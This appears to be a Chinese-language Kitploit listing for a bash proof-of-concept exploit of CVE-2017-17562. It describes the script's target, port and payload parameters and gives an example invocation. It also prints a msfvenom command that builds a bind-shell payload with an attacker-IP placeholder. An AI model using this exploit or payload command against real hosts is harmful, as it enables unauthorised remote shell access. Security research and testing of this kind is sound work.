Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
bash-CVE-2017-17562 — CVE-2017-17562 的 PoC,用 bash 编写 | Kitploit
工具/GitHubGitHub/joaomagfreitas/bash-cve-2017-17562
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Archived
GitHubjoaomagfreitas/bash-cve-2017-17562

bash-CVE-2017-17562

CVE-2017-17562 的 PoC,用 bash 编写

查看仓库
14年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

bash-CVE-2017-17562

一个用于CVE-2017-17562的BashPoC实现。

需要curl来构造HTTP请求。

基于Metasploit和@fssecur3的实现。

参数

以下参数必须设置,因为它们是侦察和载荷发送所必需的:

root@kitploit:~
$1: 被攻击远程脆弱主机的IP/主机名
$2: 远程机器Web服务器的端口
$4: 发送给脆弱主机的精心构造的载荷路径

可选地,以下参数也可以设置:

root@kitploit:~
$3: Web服务器是否运行在TLS/SSL隧道下。默认为否
$5: 已知脆弱CGI端点列表的路径,用于侦察阶段。默认为"cgi.endpoints"

示例

root@kitploit:~
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints

免责声明

本代码仅用于学习和演示目的。你不得将其用于未经许可的目标。

本仓库不提供任何载荷。但是任何匹配目标操作系统架构的二进制文件应该都能工作。要构造一个绑定shell载荷,你可以使用msfvenom:

root@kitploit:~
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so
下载工具